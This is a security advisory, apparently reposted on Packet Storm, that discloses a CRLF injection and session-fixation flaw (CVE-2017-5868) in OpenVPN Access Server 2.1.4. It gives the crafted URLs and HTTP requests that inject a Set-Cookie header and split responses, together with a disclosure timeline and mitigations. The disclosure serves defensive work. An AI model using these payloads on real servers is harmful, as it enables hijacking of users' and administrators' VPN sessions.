what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

OpenVPN Access Server 2.1.4 CRLF Injection

OpenVPN Access Server 2.1.4 CRLF Injection
Posted May 27, 2017
Authored by Julian Boulet

OpenVPN Access Server version 2.1.4 suffers from a CRLF injection vulnerability.

tags | exploit
advisories | CVE-2017-5868
SHA-256 | 10cc7e203caeb7b199f43ae4c5d590f5d394419a9369a6b7bdb1eff2af577d79

OpenVPN Access Server 2.1.4 CRLF Injection

Change Mirror Download
# OpenVPN Access Server : CRLF injection with Session fixation

## Description

OpenVPN Access Server is a full featured secure network tunneling VPN
software solution that integrates OpenVPN server capabilities,
enterprise management capabilities, simplified OpenVPN Connect UI, and
OpenVPN Client software packages that accommodate Windows, MAC, Linux,
Android, and iOS environments. OpenVPN Access Server supports a wide
range of configurations, including secure and granular remote access to
internal network and/ or private cloud network resources and
applications with fine-grained access control.

## CRLF injection + Session fixation

OpenVPN-AS (Version 2.1.4) is prone to CRLF injection.
Using the character %0A, it is possible to inject headers and content.

Furthermore, this vulnerability allow us to exploit a session fixation
attack.
Indeed, during the authentication the session cookie is poorly handled.

We have not been able to exploit it but the application may be prone to
HTTP Response Splitting attacks.

**Threat**

Exploiting these vulnerabilities, we were able to steal a session from a
victim and then access the application (OpenVPN-AS) with his rights.

Exploiting this on an administrator account may lead to serious
consequences.

**CVE ID**: CVE-2017-5868

**Access Vector**: network

**Security Risk**: medium

**Vulnerability**: CWE-113, CWE-93, CWE-384

**CVSS Base Score**: 5.3 (Medium)

**CVSS Vector**: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L

### CRLF injection

It is possible to inject a CRLF character like `%0A` using the URL :
<https://www.mysite.com/__session_start__/>

```
GET /__session_start__/%0atest HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: openvpn_sess_******=******dc61
Pragma: no-cache
Cache-Control: no-cache
```

As a result, we obtained this response from the server :

```
HTTP/1.1 302 Found
Date: Wed, 18 Jan 2017 10:19:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Location: https://www.mysite.com/
test
Server: OpenVPN-AS

<html>
<body>
<p>REDIRECT</p>
</body>
</html>
```

Thus, the `%0A` character is taken into account and we can clearly see
the test string at an unexpected location.

### Using a CRLF injection in order to do a session fixation attack

Using the CRLF injection and a problem during the authentication phase
(the session cookie is not re-generated), we were able to successfully
exploit a session fixation vulnerability.

In order to exploit this vulnerability, we followed the steps below :

1. As the victim, access the OpenVPN-AS application in order to obtain a
valid session cookie (at this point, the victim is not authenticated).
2. Sent a malicious URL to the victim in order to set his session cookie.

As an example, we aim to inject a Set-Cookie header with a known value :

```
https://www.mysite.com/__session_start__/%0aSet-Cookie:
openvpn_sess_******=******cf23; Path=/; Secure; HttpOnly
```

This URL will allow the attacker to choose the value of the session
cookie of the victim.

3. At this point, the victim needs to authenticate itself. His profile
(and rights) will then be associated with the session cookie controlled
by the attacker.
4. Finally, as the attacker, we can access the OpenVPN-AS application
with the rights of the victim (using the session cookie).

### Tries for an HTTP Response Splitting attack

We also tried to exploit an HTTP Response Splitting attack without
success, for now.

```
GET
/__session_start__/%0aSet-Cookie:%20openvpn_sess_******=******ac42;%20Path=/%0aContent-Length:%200%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:%20text/html%0aContent-Length:%2017%0a%0a<html>TEST</html>
HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: openvpn_sess_******=******dc61
Pragma: no-cache
Cache-Control: no-cache
```

As we can see, it is possible to use multiple times the character %0A,
in order to forge another response.

```
HTTP/1.1 302 Found
Date: Wed, 18 Jan 2017 10:29:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Location: https://www.mysite.com/
Set-Cookie: openvpn_sess_******=******ac42; Path=/
Content-Length: 0

Content-Length: 171

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 17

<html>TEST</html>
Server: OpenVPN-AS

3b

<html>
<body>
<p>REDIRECT</p>
</body>
</html>

0
```

### Solution

The vendor didn't provided a patch for this vulnerability. However,
several solutions can be taken :

* Use a Reverse Proxy in order to restrict CRLF characters in URI.
* Restrict access to the web interface (for instance, IP whitelisting).

From the vendor side, several steps need to be taken:

* CRLF characters must be escaped
* Session cookie must be re-generated during the authentication

## Timeline (dd/mm/yyyy)

* 18/01/2017 : Initial discovery.
* 06/02/2017 : First contact with OpenVPN Security team.
* 13/02/2017 : OpenVPN Team request to file a ticket on the Access
Server support system. (#IFX-370-42406)
* 17/02/2017 : Reply from the owner, acknowledging the vulnerability and
planning to fix the vulnerabilities.
* 29/03/2017 : Sysdream Labs request for an ETA, warning for public
disclosure.
* 21/04/2017 : New request for feedback.
* 04/05/2017 : Another and last attempt.
* 23/05/2017 : Public disclosure.

## Credits

* Julien Boulet, Sysdream (j.boulet -at- sysdream -dot- com)


--
SYSDREAM Labs <labs@sysdream.com>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close